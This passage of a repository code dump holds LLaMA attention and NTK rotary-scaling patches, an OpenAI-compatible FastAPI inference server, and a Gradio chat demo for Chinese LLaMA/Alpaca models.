cos = cos.squeeze(1).squeeze(0) # [seq_len, dim] sin = sin.squeeze(1).squeeze(0) # [seq_len, dim] cos = cos[position_ids].unsqueeze(1) # [bs, 1, seq_len, dim] sin = sin[position_ids].unsqueeze(1) # [bs, 1, seq_len, dim] q_embed = (q * cos) + (rotate_half(q) * sin) return q_embed def xformers_forward( self, hidden_states: torch.Tensor, attention_mask: Optional[torch.Tensor] = None, position_ids: Optional[torch.LongTensor] = None, past_key_value: Optional[Tuple[torch.Tensor]] = None, output_attentions: bool = False, use_cache: bool = False, ) -> Tuple[torch.Tensor, Optional[torch.Tensor], Optional[Tuple[torch.Tensor]]]: bsz, q_len, _ = hidden_states.size() query_states = self.q_proj(hidden_states).view(bsz, q_len, self.num_heads, self.head_dim).transpose(1, 2) key_states = self.k_proj(hidden_states).view(bsz, q_len, self.num_heads, self.head_dim).transpose(1, 2) value_states = self.v_proj(hidden_states).view(bsz, q_len, self.num_heads, self.head_dim).transpose(1, 2) kv_seq_len = key_states.shape[-2] if past_key_value is not None: kv_seq_len += past_key_value[0].shape[-2] if STORE_KV_BEFORE_ROPE is False: cos, sin = self.rotary_emb(value_states, seq_len=kv_seq_len) query_states, key_states = apply_rotary_pos_emb(query_states, key_states, cos, sin, position_ids) # [bsz, nh, t, hd] if past_key_value is not None: # reuse k, v, self_attention key_states = torch.cat([past_key_value[0], key_states], dim=2) value_states = torch.cat([past_key_value[1], value_states], dim=2) past_key_value = (key_states, value_states) if use_cache else None else: if past_key_value is not None: # reuse k, v, self_attention key_states = torch.cat([past_key_value[0], key_states], dim=2) value_states = torch.cat([past_key_value[1], value_states], dim=2) past_key_value = (key_states, value_states) if use_cache else None cos, sin = self.rotary_emb(value_states, seq_len=kv_seq_len) query_states = apply_rotary_pos_emb_single(query_states, cos, sin, position_ids) position_ids = torch.arange(kv_seq_len, dtype=torch.long, device=cos.device) position_ids = position_ids.unsqueeze(0).view(-1, kv_seq_len) key_states = apply_rotary_pos_emb_single(key_states, cos, sin, position_ids) if xops is not None and USE_MEM_EFF_ATTENTION: attn_weights = None query_states = query_states.transpose(1, 2) key_states = key_states.transpose(1, 2) value_states = value_states.transpose(1, 2) attn_bias = None if (query_states.size(1)==1 and key_states.size(1)>1) else xops.LowerTriangularMask() attn_output = xops.memory_efficient_attention( query_states, key_states, value_states, attn_bias=attn_bias, p=0) else: attn_weights = torch.matmul(query_states, key_states.transpose(2, 3)) / math.sqrt(self.head_dim) if attn_weights.size() != (bsz, self.num_heads, q_len, kv_seq_len): raise ValueError( f"Attention weights should be of size {(bsz * self.num_heads, q_len, kv_seq_len)}, but is" f" {attn_weights.size()}" ) if attention_mask is not None: if attention_mask.size() != (bsz, 1, q_len, kv_seq_len): raise ValueError( f"Attention mask should be of size {(bsz, 1, q_len, kv_seq_len)}, but is {attention_mask.size()}" ) attn_weights = attn_weights + attention_mask attn_weights = torch.max( attn_weights, torch.tensor(torch.finfo(attn_weights.dtype).min, device=attn_weights.device) ) # upcast attention to fp32 attn_weights = nn.functional.softmax(attn_weights, dim=-1, dtype=torch.float32).to(query_states.dtype) attn_output = torch.matmul(attn_weights, value_states) if attn_output.size() != (bsz, self.num_heads, q_len, self.head_dim): raise ValueError( f"`attn_output` 
should be of size {(bsz, self.num_heads, q_len, self.head_dim)}, but is" f" {attn_output.size()}" ) attn_output = attn_output.transpose(1, 2) attn_output = attn_output.reshape(bsz, q_len, self.hidden_size) attn_output = self.o_proj(attn_output) if not output_attentions: attn_weights = None return attn_output, attn_weights, past_key_value old_init = transformers.models.llama.modeling_llama.LlamaRotaryEmbedding.__init__ def adaptive_ntk_init(self, dim, max_position_embeddings=2048, base=10000, device=None): self.dim = dim self.alpha = ALPHA if isinstance(ALPHA,(float,int)): base = base * ALPHA ** (dim / (dim-2)) self.base = base elif ALPHA=='auto': self.base = base else: raise ValueError(ALPHA) old_init(self, dim, max_position_embeddings, base, device) ntk_inv_freq = 1.0 / (base ** (torch.arange(0, dim, 2).float().to(device) / dim)) self.register_buffer("ntk_inv_freq", ntk_inv_freq, persistent=False) def adaptive_ntk_forward(self, x, seq_len=None): if seq_len > self.max_seq_len_cached: if isinstance(self.alpha,(float,int)): self.max_seq_len_cached = seq_len t = torch.arange(seq_len, device=x.device, dtype=self.ntk_inv_freq.dtype) freqs = torch.einsum("i,j->ij", t, self.ntk_inv_freq) emb = torch.cat((freqs, freqs), dim=-1).to(x.device) self.register_buffer("cos_cached", emb.cos()[None, None, :, :], persistent=False) self.register_buffer("sin_cached", emb.sin()[None, None, :, :], persistent=False) return ( self.cos_cached[:, :, :seq_len, ...].to(dtype=x.dtype), self.sin_cached[:, :, :seq_len, ...].to(dtype=x.dtype), ) elif self.alpha=='auto': t = torch.arange(seq_len, device=x.device, dtype=self.ntk_inv_freq.dtype) dim = self.dim alpha = (seq_len / 1024 - 1) * 1.1 base = self.base * alpha ** (dim / (dim-2)) ntk_inv_freq = 1.0 / (base ** (torch.arange(0, dim, 2).float().to(x.device) / dim )) freqs = torch.einsum("i,j->ij", t, ntk_inv_freq) emb = torch.cat((freqs, freqs), dim=-1).to(x.device) cos_cached = emb.cos()[None, None, :, :] sin_cached = emb.sin()[None, None, :, :] return ( cos_cached[:, :, :seq_len, ...].to(dtype=x.dtype), sin_cached[:, :, :seq_len, ...].to(dtype=x.dtype) ) else: return ( self.cos_cached[:, :, :seq_len, ...].to(dtype=x.dtype), self.sin_cached[:, :, :seq_len, ...].to(dtype=x.dtype) ) def apply_attention_patch( use_memory_efficient_attention=False, store_kv_before_rope=False ): global USE_MEM_EFF_ATTENTION, STORE_KV_BEFORE_ROPE if use_memory_efficient_attention is True and xops is not None: USE_MEM_EFF_ATTENTION = use_memory_efficient_attention print("USE_MEM_EFF_ATTENTION: ",USE_MEM_EFF_ATTENTION) STORE_KV_BEFORE_ROPE = store_kv_before_rope print("STORE_KV_BEFORE_ROPE:", STORE_KV_BEFORE_ROPE) transformers.models.llama.modeling_llama.LlamaAttention.forward = xformers_forward def apply_ntk_scaling_patch(alpha: Union[float,str]): global ALPHA ALPHA = alpha try: ALPHA = float(ALPHA) except ValueError: if ALPHA!="auto": raise ValueError(f"Alpha can only be a float or 'auto', but given {ALPHA}") print(f"Apply NTK scaling with ALPHA={ALPHA}") transformers.models.llama.modeling_llama.LlamaRotaryEmbedding.__init__ = adaptive_ntk_init transformers.models.llama.modeling_llama.LlamaRotaryEmbedding.forward = adaptive_ntk_forward File: scripts/openai_server_demo/openai_api_protocol.py from typing import Optional, List, Dict, Any, Union import time import shortuuid from pydantic import BaseModel, Field class ChatCompletionRequest(BaseModel): model: str = "chinese-llama-alpaca" messages: Union[str, List[Dict[str, str]]] temperature: Optional[float] = 0.7 top_p: Optional[float] = 1.0 
top_k: Optional[int] = 40 n: Optional[int] = 1 max_tokens: Optional[int] = 128 num_beams: Optional[int] = 1 stop: Optional[Union[str, List[str]]] = None stream: Optional[bool] = False repetition_penalty: Optional[float] = 1.0 user: Optional[str] = None do_sample: Optional[bool] = True class ChatMessage(BaseModel): role: str content: str class ChatCompletionResponseChoice(BaseModel): index: int message: ChatMessage class ChatCompletionResponse(BaseModel): id: str = Field(default_factory=lambda: f"chatcmpl-{shortuuid.random()}") object: str = "chat.completion" created: int = Field(default_factory=lambda: int(time.time())) model: str = "chinese-llama-alpaca" choices: List[ChatCompletionResponseChoice] class EmbeddingsRequest(BaseModel): input: Union[str, List[Any]] user: Optional[str] = None class EmbeddingsResponse(BaseModel): object: str = "list" data: List[Dict[str, Any]] model: str = "chinese-llama-alpaca" class CompletionRequest(BaseModel): prompt: Union[str, List[Any]] temperature: Optional[float] = 0.1 n: Optional[int] = 1 max_tokens: Optional[int] = 128 stop: Optional[Union[str, List[str]]] = None stream: Optional[bool] = False top_p: Optional[float] = 0.75 top_k: Optional[int] = 40 num_beams: Optional[int] = 1 logprobs: Optional[int] = None echo: Optional[bool] = False repetition_penalty: Optional[float] = 1.0 user: Optional[str] = None do_sample: Optional[bool] = True class CompletionResponseChoice(BaseModel): index: int text: str class CompletionResponse(BaseModel): id: Optional[str] = Field(default_factory=lambda: f"cmpl-{shortuuid.random()}") object: Optional[str] = "text_completion" created: Optional[int] = Field(default_factory=lambda: int(time.time())) model: Optional[str] = 'chinese-llama-alpaca' choices: List[CompletionResponseChoice] File: scripts/openai_server_demo/openai_api_server.py import argparse import os from fastapi import FastAPI import uvicorn parser = argparse.ArgumentParser() parser.add_argument('--base_model', default=None, type=str, required=True) parser.add_argument('--lora_model', default=None, type=str,help="If None, perform inference on the base model") parser.add_argument('--tokenizer_path',default=None,type=str) parser.add_argument('--gpus', default="0", type=str) parser.add_argument('--load_in_8bit',action='store_true', help='use 8 bit model') parser.add_argument('--only_cpu',action='store_true',help='only use CPU for inference') parser.add_argument('--alpha',type=str,default="1.0", help="The scaling factor of NTK method, can be a float or 'auto'. 
") args = parser.parse_args() load_in_8bit = args.load_in_8bit if args.only_cpu is True: args.gpus = "" os.environ["CUDA_VISIBLE_DEVICES"] = args.gpus import torch import torch.nn.functional as F from transformers import LlamaForCausalLM, LlamaTokenizer, GenerationConfig from peft import PeftModel from patches import apply_attention_patch, apply_ntk_scaling_patch apply_attention_patch(use_memory_efficient_attention=True) apply_ntk_scaling_patch(args.alpha) from openai_api_protocol import ( ChatCompletionRequest, ChatCompletionResponse, ChatMessage, ChatCompletionResponseChoice, CompletionRequest, CompletionResponse, CompletionResponseChoice, EmbeddingsRequest, EmbeddingsResponse, ) load_type = torch.float16 if torch.cuda.is_available(): device = torch.device(0) else: device = torch.device('cpu') if args.tokenizer_path is None: args.tokenizer_path = args.lora_model if args.lora_model is None: args.tokenizer_path = args.base_model tokenizer = LlamaTokenizer.from_pretrained(args.tokenizer_path) base_model = LlamaForCausalLM.from_pretrained( args.base_model, load_in_8bit=load_in_8bit, torch_dtype=load_type, low_cpu_mem_usage=True, device_map='auto' if not args.only_cpu else None, ) model_vocab_size = base_model.get_input_embeddings().weight.size(0) tokenzier_vocab_size = len(tokenizer) print(f"Vocab of the base model: {model_vocab_size}") print(f"Vocab of the tokenizer: {tokenzier_vocab_size}") if model_vocab_size!=tokenzier_vocab_size: assert tokenzier_vocab_size > model_vocab_size print("Resize model embeddings to fit tokenizer") base_model.resize_token_embeddings(tokenzier_vocab_size) if args.lora_model is not None: print("loading peft model") model = PeftModel.from_pretrained(base_model, args.lora_model,torch_dtype=load_type,device_map='auto',) else: model = base_model if device==torch.device('cpu'): model.float() model.eval() def generate_completion_prompt(instruction: str): """Generate prompt for completion""" return f"""Below is an instruction that describes a task. Write a response that appropriately completes the request. ### Instruction: {instruction} ### Response: """ def generate_chat_prompt(messages: list): """Generate prompt for chat completion""" system_msg = '''Below is an instruction that describes a task. 
Write a response that appropriately completes the request.''' for msg in messages: if msg.role == 'system': system_msg = msg.content prompt = f"{system_msg}\n\n" for msg in messages: if msg.role == 'system': continue if msg.role == 'assistant': prompt += f"### Response: {msg.content}\n\n" if msg.role == 'user': prompt += f"### Instruction:\n{msg.content}\n\n" prompt += "### Response: " return prompt def predict( input, max_new_tokens=128, top_p=0.75, temperature=0.1, top_k=40, num_beams=4, repetition_penalty=1.0, do_sample=True, **kwargs, ): """ Main inference method type(input) == str -> /v1/completions type(input) == list -> /v1/chat/completions """ if isinstance(input, str): prompt = generate_completion_prompt(input) else: prompt = generate_chat_prompt(input) inputs = tokenizer(prompt, return_tensors="pt") input_ids = inputs["input_ids"].to(device) generation_config = GenerationConfig( temperature=temperature, top_p=top_p, top_k=top_k, num_beams=num_beams, do_sample=do_sample, **kwargs, ) with torch.no_grad(): generation_output = model.generate( input_ids=input_ids, generation_config=generation_config, return_dict_in_generate=True, output_scores=False, max_new_tokens=max_new_tokens, repetition_penalty=float(repetition_penalty), ) s = generation_output.sequences[0] output = tokenizer.decode(s, skip_special_tokens=True) output = output.split("### Response:")[-1].strip() return output def get_embedding(input): """Get embedding main function""" with torch.no_grad(): if tokenizer.pad_token == None: tokenizer.add_special_tokens({'pad_token': '[PAD]'}) encoding = tokenizer( input, padding=True, return_tensors="pt" ) input_ids = encoding["input_ids"].to(device) attention_mask = encoding["attention_mask"].to(device) model_output = model( input_ids, attention_mask, output_hidden_states=True ) data = model_output.hidden_states[-1] mask = attention_mask.unsqueeze(-1).expand(data.size()).float() masked_embeddings = data * mask sum_embeddings = torch.sum(masked_embeddings, dim=1) seq_length = torch.sum(mask, dim=1) embedding = sum_embeddings / seq_length normalized_embeddings = F.normalize(embedding, p=2, dim=1) ret = normalized_embeddings.squeeze(0).tolist() return ret app = FastAPI() @app.post("/v1/chat/completions") async def create_chat_completion(request: ChatCompletionRequest): """Creates a completion for the chat message""" msgs = request.messages if isinstance(msgs, str): msgs = [ChatMessage(role='user',content=msgs)] else: msgs = [ChatMessage(role=x['role'],content=x['message']) for x in msgs] output = predict( input=msgs, max_new_tokens=request.max_tokens, top_p=request.top_p, top_k=request.top_k, temperature=request.temperature, num_beams=request.num_beams, repetition_penalty=request.repetition_penalty, do_sample=request.do_sample, ) choices = [ChatCompletionResponseChoice(index = i, message = msg) for i, msg in enumerate(msgs)] choices += [ChatCompletionResponseChoice(index = len(choices), message = ChatMessage(role='assistant',content=output))] return ChatCompletionResponse(choices = choices) @app.post("/v1/completions") async def create_completion(request: CompletionRequest): """Creates a completion""" output = predict( input=request.prompt, max_new_tokens=request.max_tokens, top_p=request.top_p, top_k=request.top_k, temperature=request.temperature, num_beams=request.num_beams, repetition_penalty=request.repetition_penalty, do_sample=request.do_sample, ) choices = [CompletionResponseChoice(index = 0, text = output)] return CompletionResponse(choices = choices) 
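# Example client call for the /v1/completions endpoint above (a hypothetical sketch;
# field names follow the CompletionRequest model and the server's default port 19327):
#
#   import requests
#   resp = requests.post(
#       "http://localhost:19327/v1/completions",
#       json={"prompt": "给我讲一些有关杭州的信息", "max_tokens": 128, "temperature": 0.2},
#   )
#   print(resp.json()["choices"][0]["text"])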
@app.post("/v1/embeddings") async def create_embeddings(request: EmbeddingsRequest): """Creates text embedding""" embedding = get_embedding(request.input) data = [{ "object": "embedding", "embedding": embedding, "index": 0 }] return EmbeddingsResponse(data=data) if __name__ == "__main__": log_config = uvicorn.config.LOGGING_CONFIG log_config["formatters"]["access"]["fmt"] = "%(asctime)s - %(levelname)s - %(message)s" log_config["formatters"]["default"]["fmt"] = "%(asctime)s - %(levelname)s - %(message)s" uvicorn.run(app, host='0.0.0.0', port=19327, workers=1, log_config=log_config) File: scripts/inference/patches.py import torch from torch import nn from typing import Optional, Tuple, Union import transformers from transformers.models.llama.modeling_llama import apply_rotary_pos_emb, rotate_half import math try: from xformers import ops as xops except ImportError: xops = None print( "Xformers is not installed correctly. If you want to use memory_efficient_attention use the following command to install Xformers\npip install xformers." ) STORE_KV_BEFORE_ROPE = False USE_MEM_EFF_ATTENTION = False ALPHA = 1.0 def apply_rotary_pos_emb_single(q, cos, sin, position_ids): # The first two dimensions of cos and sin are always 1, so we can `squeeze` them. cos = cos.squeeze(1).squeeze(0) # [seq_len, dim] sin = sin.squeeze(1).squeeze(0) # [seq_len, dim] cos = cos[position_ids].unsqueeze(1) # [bs, 1, seq_len, dim] sin = sin[position_ids].unsqueeze(1) # [bs, 1, seq_len, dim] q_embed = (q * cos) + (rotate_half(q) * sin) return q_embed def xformers_forward( self, hidden_states: torch.Tensor, attention_mask: Optional[torch.Tensor] = None, position_ids: Optional[torch.LongTensor] = None, past_key_value: Optional[Tuple[torch.Tensor]] = None, output_attentions: bool = False, use_cache: bool = False, ) -> Tuple[torch.Tensor, Optional[torch.Tensor], Optional[Tuple[torch.Tensor]]]: bsz, q_len, _ = hidden_states.size() query_states = self.q_proj(hidden_states).view(bsz, q_len, self.num_heads, self.head_dim).transpose(1, 2) key_states = self.k_proj(hidden_states).view(bsz, q_len, self.num_heads, self.head_dim).transpose(1, 2) value_states = self.v_proj(hidden_states).view(bsz, q_len, self.num_heads, self.head_dim).transpose(1, 2) kv_seq_len = key_states.shape[-2] if past_key_value is not None: kv_seq_len += past_key_value[0].shape[-2] if STORE_KV_BEFORE_ROPE is False: cos, sin = self.rotary_emb(value_states, seq_len=kv_seq_len) query_states, key_states = apply_rotary_pos_emb(query_states, key_states, cos, sin, position_ids) # [bsz, nh, t, hd] if past_key_value is not None: # reuse k, v, self_attention key_states = torch.cat([past_key_value[0], key_states], dim=2) value_states = torch.cat([past_key_value[1], value_states], dim=2) past_key_value = (key_states, value_states) if use_cache else None else: if past_key_value is not None: # reuse k, v, self_attention key_states = torch.cat([past_key_value[0], key_states], dim=2) value_states = torch.cat([past_key_value[1], value_states], dim=2) past_key_value = (key_states, value_states) if use_cache else None cos, sin = self.rotary_emb(value_states, seq_len=kv_seq_len) query_states = apply_rotary_pos_emb_single(query_states, cos, sin, position_ids) position_ids = torch.arange(kv_seq_len, dtype=torch.long, device=cos.device) position_ids = position_ids.unsqueeze(0).view(-1, kv_seq_len) key_states = apply_rotary_pos_emb_single(key_states, cos, sin, position_ids) if xops is not None and USE_MEM_EFF_ATTENTION: attn_weights = None query_states = query_states.transpose(1, 2) 
key_states = key_states.transpose(1, 2) value_states = value_states.transpose(1, 2) attn_bias = None if (query_states.size(1)==1 and key_states.size(1)>1) else xops.LowerTriangularMask() attn_output = xops.memory_efficient_attention( query_states, key_states, value_states, attn_bias=attn_bias, p=0) else: attn_weights = torch.matmul(query_states, key_states.transpose(2, 3)) / math.sqrt(self.head_dim) if attn_weights.size() != (bsz, self.num_heads, q_len, kv_seq_len): raise ValueError( f"Attention weights should be of size {(bsz * self.num_heads, q_len, kv_seq_len)}, but is" f" {attn_weights.size()}" ) if attention_mask is not None: if attention_mask.size() != (bsz, 1, q_len, kv_seq_len): raise ValueError( f"Attention mask should be of size {(bsz, 1, q_len, kv_seq_len)}, but is {attention_mask.size()}" ) attn_weights = attn_weights + attention_mask attn_weights = torch.max( attn_weights, torch.tensor(torch.finfo(attn_weights.dtype).min, device=attn_weights.device) ) # upcast attention to fp32 attn_weights = nn.functional.softmax(attn_weights, dim=-1, dtype=torch.float32).to(query_states.dtype) attn_output = torch.matmul(attn_weights, value_states) if attn_output.size() != (bsz, self.num_heads, q_len, self.head_dim): raise ValueError( f"`attn_output` should be of size {(bsz, self.num_heads, q_len, self.head_dim)}, but is" f" {attn_output.size()}" ) attn_output = attn_output.transpose(1, 2) attn_output = attn_output.reshape(bsz, q_len, self.hidden_size) attn_output = self.o_proj(attn_output) if not output_attentions: attn_weights = None return attn_output, attn_weights, past_key_value old_init = transformers.models.llama.modeling_llama.LlamaRotaryEmbedding.__init__ def adaptive_ntk_init(self, dim, max_position_embeddings=2048, base=10000, device=None): self.dim = dim self.alpha = ALPHA if isinstance(ALPHA,(float,int)): base = base * ALPHA ** (dim / (dim-2)) self.base = base elif ALPHA=='auto': self.base = base else: raise ValueError(ALPHA) old_init(self, dim, max_position_embeddings, base, device) ntk_inv_freq = 1.0 / (base ** (torch.arange(0, dim, 2).float().to(device) / dim)) self.register_buffer("ntk_inv_freq", ntk_inv_freq, persistent=False) def adaptive_ntk_forward(self, x, seq_len=None): if seq_len > self.max_seq_len_cached: if isinstance(self.alpha,(float,int)): self.max_seq_len_cached = seq_len t = torch.arange(seq_len, device=x.device, dtype=self.ntk_inv_freq.dtype) freqs = torch.einsum("i,j->ij", t, self.ntk_inv_freq) emb = torch.cat((freqs, freqs), dim=-1).to(x.device) self.register_buffer("cos_cached", emb.cos()[None, None, :, :], persistent=False) self.register_buffer("sin_cached", emb.sin()[None, None, :, :], persistent=False) return ( self.cos_cached[:, :, :seq_len, ...].to(dtype=x.dtype), self.sin_cached[:, :, :seq_len, ...].to(dtype=x.dtype), ) elif self.alpha=='auto': t = torch.arange(seq_len, device=x.device, dtype=self.ntk_inv_freq.dtype) dim = self.dim alpha = (seq_len / 1024 - 1) * 1.1 base = self.base * alpha ** (dim / (dim-2)) ntk_inv_freq = 1.0 / (base ** (torch.arange(0, dim, 2).float().to(x.device) / dim )) freqs = torch.einsum("i,j->ij", t, ntk_inv_freq) emb = torch.cat((freqs, freqs), dim=-1).to(x.device) cos_cached = emb.cos()[None, None, :, :] sin_cached = emb.sin()[None, None, :, :] return ( cos_cached[:, :, :seq_len, ...].to(dtype=x.dtype), sin_cached[:, :, :seq_len, ...].to(dtype=x.dtype) ) else: return ( self.cos_cached[:, :, :seq_len, ...].to(dtype=x.dtype), self.sin_cached[:, :, :seq_len, ...].to(dtype=x.dtype) ) def apply_attention_patch( 
use_memory_efficient_attention=False, store_kv_before_rope=False ): global USE_MEM_EFF_ATTENTION, STORE_KV_BEFORE_ROPE if use_memory_efficient_attention is True and xops is not None: USE_MEM_EFF_ATTENTION = use_memory_efficient_attention print("USE_MEM_EFF_ATTENTION: ",USE_MEM_EFF_ATTENTION) STORE_KV_BEFORE_ROPE = store_kv_before_rope print("STORE_KV_BEFORE_ROPE:", STORE_KV_BEFORE_ROPE) transformers.models.llama.modeling_llama.LlamaAttention.forward = xformers_forward def apply_ntk_scaling_patch(alpha: Union[float,str]): global ALPHA ALPHA = alpha try: ALPHA = float(ALPHA) except ValueError: if ALPHA!="auto": raise ValueError(f"Alpha can only be a float or 'auto', but given {ALPHA}") print(f"Apply NTK scaling with ALPHA={ALPHA}") transformers.models.llama.modeling_llama.LlamaRotaryEmbedding.__init__ = adaptive_ntk_init transformers.models.llama.modeling_llama.LlamaRotaryEmbedding.forward = adaptive_ntk_forward File: scripts/inference/gradio_demo.py import torch from transformers import ( LlamaForCausalLM, LlamaTokenizer, StoppingCriteria, ) import gradio as gr import argparse import os from queue import Queue from threading import Thread import traceback import gc # Parse command-line arguments parser = argparse.ArgumentParser() parser.add_argument( '--base_model', default=None, type=str, required=True, help='Base model path') parser.add_argument('--lora_model', default=None, type=str, help="If None, perform inference on the base model") parser.add_argument( '--tokenizer_path', default=None, type=str, help='If None, lora model path or base model path will be used') parser.add_argument( '--gpus', default="0", type=str, help='If None, cuda:0 will be used. Inference using multi-cards: --gpus=0,1,... ') parser.add_argument('--share', default=True, help='Share gradio domain name') parser.add_argument('--port', default=19324, type=int, help='Port of gradio demo') parser.add_argument( '--max_memory', default=256, type=int, help='Maximum input prompt length, if exceeded model will receive prompt[-max_memory:]') parser.add_argument( '--load_in_8bit', action='store_true', help='Use 8 bit quantified model') parser.add_argument( '--only_cpu', action='store_true', help='Only use CPU for inference') parser.add_argument( '--alpha', type=str, default="1.0", help="The scaling factor of NTK method, can be a float or 'auto'. 
") args = parser.parse_args() if args.only_cpu is True: args.gpus = "" from patches import apply_attention_patch, apply_ntk_scaling_patch apply_attention_patch(use_memory_efficient_attention=True) apply_ntk_scaling_patch(args.alpha) # Set CUDA devices if available os.environ["CUDA_VISIBLE_DEVICES"] = args.gpus # Peft library can only import after setting CUDA devices from peft import PeftModel # Set up the required components: model and tokenizer def setup(): global tokenizer, model, device, share, port, max_memory max_memory = args.max_memory port = args.port share = args.share load_in_8bit = args.load_in_8bit load_type = torch.float16 if torch.cuda.is_available(): device = torch.device(0) else: device = torch.device('cpu') if args.tokenizer_path is None: args.tokenizer_path = args.lora_model if args.lora_model is None: args.tokenizer_path = args.base_model tokenizer = LlamaTokenizer.from_pretrained(args.tokenizer_path) base_model = LlamaForCausalLM.from_pretrained( args.base_model, load_in_8bit=load_in_8bit, torch_dtype=load_type, low_cpu_mem_usage=True, device_map='auto', ) model_vocab_size = base_model.get_input_embeddings().weight.size(0) tokenzier_vocab_size = len(tokenizer) print(f"Vocab of the base model: {model_vocab_size}") print(f"Vocab of the tokenizer: {tokenzier_vocab_size}") if model_vocab_size != tokenzier_vocab_size: assert tokenzier_vocab_size > model_vocab_size print("Resize model embeddings to fit tokenizer") base_model.resize_token_embeddings(tokenzier_vocab_size) if args.lora_model is not None: print("loading peft model") model = PeftModel.from_pretrained( base_model, args.lora_model, torch_dtype=load_type, device_map='auto', ) else: model = base_model if device == torch.device('cpu'): model.float() model.eval() # Reset the user input def reset_user_input(): return gr.update(value='') # Reset the state def reset_state(): return [] # Generate the prompt for the input of LM model def generate_prompt(instruction): return f""" Below is an instruction that describes a task. Write a response that appropriately completes the request. {instruction} """ # User interaction function for chat def user(user_message, history): return gr.update(value="", interactive=False), history + \ [[user_message, None]] class Stream(StoppingCriteria): def __init__(self, callback_func=None): self.callback_func = callback_func def __call__(self, input_ids, scores) -> bool: if self.callback_func is not None: self.callback_func(input_ids[0]) return False class Iteratorize: """ Transforms a function that takes a callback into a lazy iterator (generator). 
Adapted from: https://stackoverflow.com/a/9969000 """ def __init__(self, func, kwargs=None, callback=None): self.mfunc = func self.c_callback = callback self.q = Queue() self.sentinel = object() self.kwargs = kwargs or {} self.stop_now = False def _callback(val): if self.stop_now: raise ValueError self.q.put(val) def gentask(): try: ret = self.mfunc(callback=_callback, **self.kwargs) except ValueError: pass except Exception: traceback.print_exc() clear_torch_cache() self.q.put(self.sentinel) if self.c_callback: self.c_callback(ret) self.thread = Thread(target=gentask) self.thread.start() def __iter__(self): return self def __next__(self): obj = self.q.get(True, None) if obj is self.sentinel: raise StopIteration else: return obj def __del__(self): clear_torch_cache() def __enter__(self): return self def __exit__(self, exc_type, exc_val, exc_tb): self.stop_now = True clear_torch_cache() def clear_torch_cache(): gc.collect() if torch.cuda.device_count() > 0: torch.cuda.empty_cache() # Perform prediction based on the user input and history @torch.no_grad() def predict( history, max_new_tokens=128, top_p=0.75, temperature=0.1, top_k=40, do_sample=True, repetition_penalty=1.0 ): history[-1][1] = "" if len(history) != 0: input = "".join(["### Instruction:\n" + i[0] + "\n\n" + "### Response: " + i[1] + ("\n\n" if i[1] != "" else "") for i in history]) if len(input) > max_memory: input = input[-max_memory:] prompt = generate_prompt(input) inputs = tokenizer(prompt, return_tensors="pt") input_ids = inputs["input_ids"].to(device) generate_params = { 'input_ids': input_ids, 'max_new_tokens': max_new_tokens, 'top_p': top_p, 'temperature': temperature, 'top_k': top_k, 'do_sample': do_sample, 'repetition_penalty': repetition_penalty, } def generate_with_callback(callback=None, **kwargs): if 'stopping_criteria' in kwargs: kwargs['stopping_criteria'].append(Stream(callback_func=callback)) else: kwargs['stopping_criteria'] = [Stream(callback_func=callback)] clear_torch_cache() with torch.no_grad(): model.generate(**kwargs) def generate_with_streaming(**kwargs): return Iteratorize(generate_with_callback, kwargs, callback=None) with generate_with_streaming(**generate_params) as generator: for output in generator: next_token_ids = output[len(input_ids[0]):] if next_token_ids[0] == tokenizer.eos_token_id: break new_tokens = tokenizer.decode( next_token_ids, skip_special_tokens=True) if isinstance(tokenizer, LlamaTokenizer) and len(next_token_ids) > 0: if tokenizer.convert_ids_to_tokens(int(next_token_ids[0])).startswith('▁'): new_tokens = ' ' + new_tokens history[-1][1] = new_tokens yield history if len(next_token_ids) >= max_new_tokens: break # Call the setup function to initialize the components setup() # Create the Gradio interface with gr.Blocks() as demo: github_banner_path = 'https://raw.githubusercontent.com/ymcui/Chinese-LLaMA-Alpaca/main/pics/banner.png' gr.HTML(f'<p align="center"><a href="https://github.com/ymcui/Chinese-LLaMA-Alpaca"><img src={github_banner_path} width="700"/></a></p>') gr.Markdown("> 为了促进大模型在中文NLP社区的开放研究,本项目开源了中文LLaMA模型和指令精调的Alpaca大模型。这些模型在原版LLaMA的基础上扩充了中文词表并使用了中文数据进行二次预训练,进一步提升了中文基础语义理解能力。同时,中文Alpaca模型进一步使用了中文指令数据进行精调,显著提升了模型对指令的理解和执行能力。") chatbot = gr.Chatbot() with gr.Row(): with gr.Column(scale=4): with gr.Column(scale=12): user_input = gr.Textbox( show_label=False, placeholder="Shift + Enter发送消息...", lines=10).style( container=False) with gr.Column(min_width=32, scale=1): submitBtn = gr.Button("Submit", variant="primary") with gr.Column(scale=1): emptyBtn = gr.Button("Clear 
History") max_new_token = gr.Slider( 0, 4096, value=512, step=1.0, label="Maximum New Token Length", interactive=True) top_p = gr.Slider(0, 1, value=0.9, step=0.01, label="Top P", interactive=True) temperature = gr.Slider( 0, 1, value=0.5, step=0.01, label="Temperature", interactive=True) top_k = gr.Slider(1, 40, value=40, step=1, label="Top K", interactive=True) do_sample = gr.Checkbox( value=True, label="Do Sample", info="use random sample strategy", interactive=True) repetition_penalty = gr.Slider( 1.0, 3.0, value=1.1, step=0.1, label="Repetition Penalty", interactive=True) params = [user_input, chatbot] predict_params = [ chatbot, max_new_token, top_p, temperature, top_k, do_sample, repetition_penalty] submitBtn.click( user, params, params, queue=False).then( predict, predict_params, chatbot).then( lambda: gr.update( interactive=True), None, [user_input], queue=False) user_input.submit( user, params, params, queue=False).then( predict, predict_params, chatbot).then( lambda: gr.update( interactive=True), None, [user_input], queue=False) submitBtn.click(reset_user_input, [], [user_input]) emptyBtn.click(reset_state, outputs=[chatbot], show_progress=True) # Launch the Gradio interface demo.queue().launch( share=share, inbrowser=True, server_name='0.0.0.0', server_port=port) File: scripts/inference/inference_hf.py import argparse import json, os parser = argparse.ArgumentParser() parser.add_argument('--base_model', default=None, type=str, required=True) parser.add_argument('--lora_model', default=None, type=str,help="If None, perform inference on the base model") parser.add_argument('--tokenizer_path',default=None,type=str) parser.add_argument('--data_file',default=None, type=str,help="A file that contains instructions (one instruction per line)") parser.add_argument('--with_prompt',action='store_true',help="wrap the input with the prompt automatically") parser.add_argument('--interactive',action='store_true',help="run in the instruction mode (single-turn)") parser.add_argument('--predictions_file', default='./predictions.json', type=str) parser.add_argument('--gpus', default="0", type=str) parser.add_argument('--only_cpu',action='store_true',help='only use CPU for inference') parser.add_argument('--alpha',type=str,default="1.0", help="The scaling factor of NTK method, can be a float or 'auto'. ") parser.add_argument('--load_in_8bit',action='store_true', help="Load the LLM in the 8bit mode") args = parser.parse_args() if args.only_cpu is True: args.gpus = "" os.environ["CUDA_VISIBLE_DEVICES"] = args.gpus import torch from transformers import 